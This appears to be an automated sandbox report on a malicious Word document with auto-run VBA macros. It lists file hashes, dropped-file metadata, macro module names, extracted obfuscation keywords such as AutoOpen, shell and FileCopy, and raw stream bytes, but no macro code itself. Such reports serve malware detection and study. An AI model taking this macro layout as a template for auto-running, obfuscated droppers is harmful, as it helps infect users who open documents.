SSDEEP: | 24:8xJvKgz97TLn0AWHlHD+C3S7aB6myxJvKgz97TLn0AWHlHD+C3S7aB6m:8vvKarDWHgC3DB6pvvKarDWHgC3DB6 |
MD5: | 4E46CCE2B28C2C8F37445649C41C3D13 |
SHA1: | 53466F4075B1C2DA347CAC97D9DF3328475AE4AA |
SHA-256: | 51E4ACCBF645FBA5364F0778E421EB5860A68FC62E0445581E8A622806CCBC7D |
SHA-512: | CD886689C52BC3F75ADAE18F4005735E8B3F06C265D862378BDAB418ED36ADE3FA1859DCAD9C26938B52AB170CC4D9B5370135630EE6864A26DF7E20F188E9C8 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 104 |
Entropy (8bit): | 4.257252520997243 |
Encrypted: | false |
SSDEEP: | 3:M18H9LRBa9CZELRBa9CmX18H9LRBa9Cv:M+H9LCgELC2H9LCs |
MD5: | E4D38C0BB0C8C137A27C95905AF5428E |
SHA1: | 8D6D1A7BD1F255BE9B0F781D48887D9FFAC1BE48 |
SHA-256: | 461FC19670225BA840A06E93B71E3170F24C1B0C0362756ADABA3389BD5D31C5 |
SHA-512: | 89E37B3E835960A39E17FFEF53755EFB4309DE3F8F93FBF8A1381A2E1DCC27AB8AAF7F5C902177EBEBFFBB95A0B7D3679DD3853975331DDA6B1D49F36A1C692B |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.270627014481718 |
Encrypted: | false |
SSDEEP: | 3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO |
MD5: | 91C0013827A6C6DC8AAAE35D0CD89DC6 |
SHA1: | 118F5DE34C62F8B7A3117BD1BDCCC30DDA804688 |
SHA-256: | EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8 |
SHA-512: | 40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.270627014481718 |
Encrypted: | false |
SSDEEP: | 3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO |
MD5: | 91C0013827A6C6DC8AAAE35D0CD89DC6 |
SHA1: | 118F5DE34C62F8B7A3117BD1BDCCC30DDA804688 |
SHA-256: | EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8 |
SHA-512: | 40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.894769517768764 |
TrID: |
|
File name: | documenti 12.01.20.doc |
File size: | 93665 |
MD5: | f530de77053a5c25a94f930bb954bcf8 |
SHA1: | 46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4 |
SHA256: | 1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82 |
SHA512: | f35b4d0cf4d0665117f58792a4d0fe51f13210921c1ac9d715160a4f9708e09817c6f0ab65e2c37c493a22d41fdacaaba1775fb8cc205b9d3e4855258892f916 |
SSDEEP: | 1536:A/rBcK6fNcSI7O8hRe7Il+Oy4wUOAL2wPbnQ/Tz6CaC/B2RrNbSxQml:w6lfNu/Q7Y9wkFncTZB2RrN9S |
File Content Preview: | PK..........!.[...............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74f4c4c6c1cac4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Template: | |
Total Edit Time: | 0 |
Number of Pages: | 1 |
Number of Words: | 0 |
Number of Characters: | 0 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Number of Lines: | 3 |
Number of Paragraphs: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0000 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 1127 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 1127 |
Data ASCII: | . . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . s . . : . . \\ L . . # Y * . . . . . g ~ . . L . o . . . . . . . . . . . . . . . . . . . . . . . . . . ! } . . . . u D . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ! } . . . . u D . 1 . . . . . . s . . : . . \\ L . . # Y * . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 0e 35 d7 f8 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 73 04 ec 3a 99 d0 5c 4c bb d7 23 59 2a 88 09 7f 14 fb 67 20 7e 8f de 4c 81 6f 96 90 b4 fc f3 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Creatable |
VB_Name |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
"ThisDocument" |
VBA Code |
---|
|
VBA File Name: a7A5m.bas, Stream Size: 5178 |
---|
General | |
---|---|
Stream Path: | VBA/a7A5m |
VBA File Name: | a7A5m.bas |
Stream Size: | 5178 |
Data ASCII: | . . . . . . . . . j . . . . . . . . . . . . . . . q . . . ] . . . . . . . . . . . . 5 > Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 6a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 71 03 00 00 5d 0e 00 00 00 00 00 00 01 00 00 00 0e 35 3e 51 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
joins |
effigy |
photo |
maidenhead |
torah |
imprint |
co-operative |
unfavorable |
Collects |
Public |
Diagram |
aSGxU |
Makeup |
father |
abhorred |
controls |
Cutting |
unpropitious |
minerva |
Training |
Adventures |
unveil |
Mysimon |
Replace(aPENSZ, |
slanderous |
webcast |
savoury |
nucleus |
liberia |
footstool |
Adroit |
nutmeg |
greenish |
inter |
adHaPl |
Hallow |
warner |
manger |
ethical |
Since |
pickled |
Routing |
Sniff |
Giants |
Nickel |
seventy-four |
fellowship |
shadow |
Maudlin |
stefan |
Tribal |
tabooed |
akSqK(aPENSZ) |
expire |
along |
vaccine |
reaction |
Rancid |
patricia |
lackey |
coxcomb |
Workflow |
axIuO |
succeed |
daisy |
syria |
Receptacle |
Defraud |
Knowledge |
Contacts |
Sorcery |
transit |
undersigned |
leniency |
sacrilegious |
aYKyQ |
dearborn |
insulation |
detecting |
cloud |
Glucose |
willy |
wealth |
probity |
exhort |
Accelerated |
ballast |
Articulated |
transverse |
azUoN |
Outcome |
Specifies |
graphic |
brandishing |
Attribute |
gamespot |
rectangular |
patients |
awAlq() |
tumults |
Enemies |
Basketball |
VB_Name |
Gloating |
(axSiN) |
Issue |
counterfeit |
Function |
Retrospect |
unadulterated |
comfort |
hybrid |
Munich |
brandon |
delay |
located |
actors |
commentary |
akSqK |
cubic |
stacy |
photographers |
Airport |
characters |
dappled |
chris |
mangrove |
knack |
Generates |
statute |
Attorney |
coupling |
navel |
Pyramid |
steady |
bakery |
Boolean |
Terrace |
Verzeichnis |
turnpike |
VBA Code |
---|
|
VBA File Name: aH8xms.bas, Stream Size: 863 |
---|
General | |
---|---|
Stream Path: | VBA/aH8xms |
VBA File Name: | aH8xms.bas |
Stream Size: | 863 |
Data ASCII: | . . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 11 03 00 00 00 00 00 00 01 00 00 00 0e 35 b2 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
awAlq |
Attribute |
AutoOpen() |
VB_Name |
VBA Code |
---|
|
VBA File Name: aIsb7.bas, Stream Size: 5040 |
---|
General | |
---|---|
Stream Path: | VBA/aIsb7 |
VBA File Name: | aIsb7.bas |
Stream Size: | 5040 |
Data ASCII: | . . . . . . . . . : . . . . . . . . . . . . . . . A . . . 1 . . . . . . . . . . . . 5 . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 3a 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 06 00 00 31 0f 00 00 00 00 00 00 01 00 00 00 0e 35 df 77 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Blackmail |
developer |
valuation |
plume |
aMslO(aucpr) |
amZcqK |
Berkeley |
plenipotentiary |
translations |
aYzBn |
roundabout |
aVzRp() |
(akSqK(aucpr)) |
Pronoun |
aCqnt |
positions |
teams |
purveyor |
arthur |
louis |
soviet |
Tatiana |
axSiN |
motherboard |
numeric |
Idiom |
perspective |
dialectic |
shallows |
gazette |
Discovery |
felony |
unconvinced |
roller |
Proven |
medicare |
ElseIf |
clime |
cartwright |
importunate |
moiety |
guess |
Bulldog |
adeKx |
Bereavement |
asses |
participated |
Waylaid |
confiscate |
grandchildren |
Barely |
axSiN() |
Shutter |
Coiled |
realty |
compute |
Precedence |
vapid |
Attribute |
handcuffs |
aaqRT |
transparency |
specialized |
propaganda |
VB_Name |
calvin |
telephony |
everyday |
Function |
baste |
demesne |
switching |
Springer |
Modes |
Luggage |
Avant |
catalog |
Milky |
hearthstone |
tracy |
expand |
aMslO |
Johns |
sunset |
requires |
VBA Code |
---|
|
VBA File Name: aOMv0.bas, Stream Size: 3156 |
---|
General | |
---|---|
Stream Path: | VBA/aOMv0 |
VBA File Name: | aOMv0.bas |
Stream Size: | 3156 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 k > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 11 09 00 00 00 00 00 00 01 00 00 00 0e 35 6b 3e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
causes |
anFJy |
exclusively |
Truly |
Browser |
aYzBn(aDKIk, |
smell |
Searched |
adBRr(anFJy) |
Surrounding |
recommendations |
nazarene |
Constitutes |
proteins |
delegation |
String |
aMnjk |
commentator |
zoological |
trunk |
Juvenile |
pearly |
ElseIf |
Insider |
learning |
Oreilly |
Asc(aMnjk) |
Treasurer |
alfred |
aDKIk |
Integer |
limousine |
Alexander |
Respiratory |
aJjwu) |
abomination |
delayed |
Memoirs |
Attribute |
ascendancy |
acclaim |
Imprecation |
VB_Name |
wampum |
Etymology |
undeceive |
Function |
priory |
humanities |
relatives |
sufficiency |
aJjwu |
unless |
persons |
(aDKIk |
elusive |
Stumped |
turnpike |
VBA Code |
---|
|
VBA File Name: aRZcbw.bas, Stream Size: 4810 |
---|
General | |
---|---|
Stream Path: | VBA/aRZcbw |
VBA File Name: | aRZcbw.bas |
Stream Size: | 4810 |
Data ASCII: | . . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 62 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 04 00 00 b1 0d 00 00 00 00 00 00 01 00 00 00 0e 35 b6 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
uninterested |
determinate |
Const |
serenade |
fraser |
unreliable |
Public |
Contacting |
adolescence |
Kinswoman |
wickedly |
walnut |
blots |
undivided |
vociferous |
Antigua |
Librarian |
Indolence |
procedures |
encounter |
Campaign |
riven |
Defined |
belfast |
tradespeople |
dizziness |
Abstention |
Terrorist |
Maidenhead |
Anniversary |
phosphoric |
dialectic |
enemies |
Dentists |
String |
Upskirt |
Nearly |
undecided |
affordable |
timeline |
Obviously |
selective |
offset |
const |
restrictions |
would |
shove |
nomenclature |
axIuO() |
Gentle |
Choosing |
Maine |
gamma |
consulting |
strumpet |
schooling |
Metallic |
dietary |
stumble |
landscape |
Straightforward |
prove |
deuteronomy |
ravage |
Ecological |
brazilian |
Integer |
jerky |
adroitly |
walter |
daughter-in-law |
aVzRp |
shell |
supporters |
catering |
magnanimous |
Stylish |
haven |
assets |
boarding |
holland |
washington |
"aRZcbw" |
Attribute |
abortion |
economies |
compensation |
Receptor |
latch |
Dysentery |
Variety |
expanding |
VB_Name |
Esquire |
Fisting |
aYKyQ() |
collapse |
Function |
completeness |
cambodia |
branch |
elliptical |
Entrust |
reporting |
demanding |
consolidation |
sceptic |
priced |
Gamma |
Sensuality |
unload |
cover |
brooded |
strings |
VBA Code |
---|
|
VBA File Name: abh0Rg.bas, Stream Size: 4574 |
---|
General | |
---|---|
Stream Path: | VBA/abh0Rg |
VBA File Name: | abh0Rg.bas |
Stream Size: | 4574 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 ca 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff d1 03 00 00 e1 0c 00 00 00 00 00 00 01 00 00 00 0e 35 f9 c7 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
seasonal |
pointed |
Trains |
Cancelled |
theaters |
swain |
fullness |
Public |
sulky |
referring |
explain |
compost |
Aquarium |
bullet |
digit |
downpour |
Changelog |
alabaster |
denounce |
Candy |
self-evident |
Homesickness |
Machinist |
statistical |
Primacy |
FreeFile |
Love-making |
Truism |
companies |
mother-in-law |
Competition |
subway |
analytical |
walrus |
greenhouse |
Flaccid |
Webshots |
Tress |
tricolor |
pacific |
pretension |
radius |
Drawn |
FileNumber |
Breakdown |
diffidence |
Biology |
aicyF |
illusory |
wikipedia |
poison |
adBRr |
dutch |
suggesting |
participation |
Plaza |
Sanity |
Gaoler |
impromptu |
isthmus |
Amber |
sender |
urges |
changes |
#FileNumber |
confidentiality |
tunisia |
liqueur |
Simulated |
coding |
venues |
seashore |
reservation |
lighthouse |
swimmer |
Arising |
aicyF) |
lambent |
sloped |
shortening |
fahrenheit |
transcendent |
#FileNumber, |
flexible |
Winsome |
Georgia |
option |
Forests |
lazarus |
labourer |
bukkake |
Grenada |
Surplus |
Attribute |
avhZYf |
aVOhvn |
Syntax |
Close |
devious |
engineers |
cleaner |
VB_Name |
lichen |
Outwards |
stubbornly |
proceeds |
trusted |
Function |
belle |
depth |
highlighted |
FileCopy |
louisville |
Inconsistency |
ungracious |
opposite |
adBRr(avhZYf) |
disagree |
Indisputable |
Output |
classroom |
notch |
Abandons |
allegorical |
Overhung |
eddies |
Adultery |
Intact |
VBA Code |
---|
|
VBA File Name: adGbPA.bas, Stream Size: 4586 |
---|
General | |
---|---|
Stream Path: | VBA/adGbPA |
VBA File Name: | adGbPA.bas |
Stream Size: | 4586 |
Data ASCII: | . . . . . . . . . J . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . 5 . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 4a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 51 03 00 00 f5 0c 00 00 00 00 00 00 01 00 00 00 0e 35 ee 60 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
intervals |
octagonal |
neigh |
signs |
astrology |
legitimately |
tittle |
southwest |
Technique |
Matins |
rejoin |
Mephistopheles |
intimidation |
Burdensome |
Responsibility |
syllogism |
Adobe |
pounds |
patrick |
concave |
Bequeath |
Types |
hesse |
Select |
pragmatic |
excavation |
magnificent |
Vishnu |
abolitionist |
estimated |
occurrence |
Vassal |
adkJvD |
Armenia |
Sanctified |
dunbar |
Systematically |
component |
Departments |
modular |
lucrative |
Stating |
Attica |
derivation |
attending |
Bouquet |
losses |
leave-taking |
Screens |
fleshy |
primal |
Hybrid |
)o)l)l)e)h)"), |
Redden |
utility |
clustering |
Unless |
athens |
totality |
"adGbPA" |
inferno |
recurring |
expiring |
Sampson |
languidly |
Marrow |
trojan |
Attribute |
Counsellor |
Receipt |
headers |
Inactive |
Sundown |
lingo |
charlotte |
thirty-nine |
aGSfMv() |
VB_Name |
Terminal |
overran |
Wicked |
Function |
silhouette |
recovery |
Mario |
Infringement |
Ticket |
pichunter |
chemist |
Blue-black |
brainless |
cliff |
complacent |
compendium |
aGSfMv |
defilement |
annuity |
register |
foundry |
Displacement |
remonstrate |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 618 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 618 |
Entropy: | 5.34267626544 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 8 6 2 6 2 4 0 6 - 3 0 4 D - 4 E F A - A 4 4 C - C 5 5 4 C 4 7 8 6 1 3 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a H 8 x m s . . M o d u l e = a R Z c b w . . M o d u l e = a b h 0 R g . . M o d u l e = a 7 A 5 m . . M o d u l e = a d G b P A . . M o d u l e = a I s b 7 . . M o d u l e = a O M v 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 C |
Data Raw: | 49 44 3d 22 7b 38 36 32 36 32 34 30 36 2d 33 30 34 44 2d 34 45 46 41 2d 41 34 34 43 2d 43 35 35 34 43 34 37 38 36 31 33 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 61 48 38 78 6d 73 0d 0a 4d 6f 64 75 6c 65 3d 61 52 5a 63 62 77 0d 0a 4d 6f 64 75 6c 65 3d 61 62 68 30 52 67 0d 0a 4d 6f 64 75 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 179 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 179 |
Entropy: | 3.66892704793 |
Base64 Encoded: | True |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a H 8 x m s . a . H . 8 . x . m . s . . . a R Z c b w . a . R . Z . c . b . w . . . a b h 0 R g . a . b . h . 0 . R . g . . . a 7 A 5 m . a . 7 . A . 5 . m . . . a d G b P A . a . d . G . b . P . A . . . a I s b 7 . a . I . s . b . 7 . . . a O M v 0 . a . O . M . v . 0 . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 61 48 38 78 6d 73 00 61 00 48 00 38 00 78 00 6d 00 73 00 00 00 61 52 5a 63 62 77 00 61 00 52 00 5a 00 63 00 62 00 77 00 00 00 61 62 68 30 52 67 00 61 00 62 00 68 00 30 00 52 00 67 00 00 00 61 37 41 35 6d 00 61 00 37 00 41 00 35 00 6d 00 00 00 61 64 47 62 50 41 00 61 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4172 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4172 |
Entropy: | 4.76403916663 |
Base64 Encoded: | True |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2119 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2119 |
Entropy: | 3.47748136877 |
Base64 Encoded: | True |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . A . . . . . . V H . . . . . . . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 230 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 230 |
Entropy: | 1.75961915218 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
